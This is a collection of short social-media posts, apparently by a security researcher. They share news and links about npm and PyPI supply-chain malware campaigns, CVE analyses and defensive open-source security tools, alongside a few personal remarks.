It was an interesting 72 hours tracking down the second wave of Shai Hulud campaign. It's more sophisticated and aggressive than the first one. We published all what we know about it here securitylabs.datadoghq.com/articles/sha... #npm #shaihulud #malware
Our team tracked down a malicious campaign in NPM deploying Vidar stealer. This is the first time we see Vidar stealer distributed via supply chain attack.
securitylabs.datadoghq.com/articles/mut...
#npm #malware #supplychainattack
I still didn't install bat yet but looks very good. I will do it now.
I'm in love with claude code. The way it handles code writing and automates bash tasks is amazing and so convenient to me.
if you are an experienced developer, know what you are doing, the tasks that usually take Weeks. You will be able to do it in Hours 🤯🤯 #claudecode #ai
Q for developers. Do you love/hate mandatory security training? And why?
#security #training #developers
🚨 The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions!
Deep dive analysis in this obfuscated campaign including (PowerShell & VBS scripts, PE malware, Malicious browser extensions even stegomalware)
Enjoy reading securitylabs.datadoghq.com/articles/mut...
Pretty interesting threat campaign have been discovered by our research team.
We will be disclosing it in couple of hours , stay tuned 😉
#threats #malicious #security_research #datadog
Recognizing employees for a job well done is just as important as giving constructive feedback when they underperform. Balance builds growth. #Leadership #Feedback
I don't like threat actors attribution that much because in most cases it's wrong and so easily to be forged. We still should cluster campaigns but there is no "high confidence" attribution IMHO.
Nice work for using AI to create POC by analysis the patch diff
platformsecurity.com/blog/CVE-202...
I have been told there will be a special announcement at 10am CET (that's 4am EDT btw) regarding this.
I will release the info I have at that time also. Thank you for the support.
Any idea what will happen to the CVE program after MITRE
x.com/0xTib3rius/s...
Picture of the tutorial room in Kubecon eu 2025
It’s the tutorial room at #kubecon where we’ll be hacking up a storm in just over 30 minutes!
Interesting to see secret leaks in git still one the biggest threats in SDLC.
github.blog/security/app...
I think it's time for me to start digging into AI and LLMs. I'm not sure where to start, any advice?
Seeing phrack magazine brings so much good memories. Good old days.
It's amazing how important one Phrack article from 27 years ago has been for web application security.
Covering what we now call SQL Injection and SSRF (amongst other things) problems we're still trying to handle today laid out in a couple of paragraphs
phrack.org/issues/54/8#...
This time we analyzed the Next.js middleware bypass vulnerability (CVE-2025-29927). Also included IP/UA trying to exploit this in the wild.
securitylabs.datadoghq.com/articles/nex...
Our analysis and takeaways for IngressNightmare - Several vulnerabilities in the Kubernetes Ingress NGINX Controller. Enjoy!
securitylabs.datadoghq.com/articles/ing...
I love it when some people tells me that's is your limit, this is your ceiling. This is when I feel fire within me reignite!
Amazing presentation about supply chain security and the amazing work we do by our leaders @techy.detectionengineering.net
(Director of research) and Andrewkrug (Manager of advocacy) youtu.be/1b0RIi19qrw?...
Supply chain firewall in action
github.com/DataDog/supp...
We are happy to introduce our latest tool "Supply Chain Firewall" 🎉 by @ikretz.bsky.social
The tool detects & prevents installation of malicious packages in local development environment.
Read more
securitylabs.datadoghq.com/articles/int...
And give it a try github.com/DataDog/supp...
Supply-chain attack in the ultralytics PyPI package: github.com/ultralytics/...
An attacker opened a pull request and pushed a commit with a malicious name, leading to CI code injection.
They then backdoored versions 8.3.41 and 8.3.42 with code downloading a second-stage binary from GitHub
Common reasoning is that SMS 2FA is bad due to the risk of SIM swapping. It’s also bad if the telecommunications networks are hostile 😬
www.forbes.com/sites/zakdof...
Awesome, Stratus Red Team v2.20.0 is now available 🎉
My Blackhat MEA arsenal presentation: "Detect Malicious Packages with Guarddog"
drive.google.com/file/d/11SAN...
Looks good, I will give it a try this weekend
We released Censeye today, an open source CLI tool that makes it dramatically easier to pivot and find related assets when threat hunting on Censys instead of manually checking for potential identifying characteristics like an SSH host key. github.com/Censys-Resea...
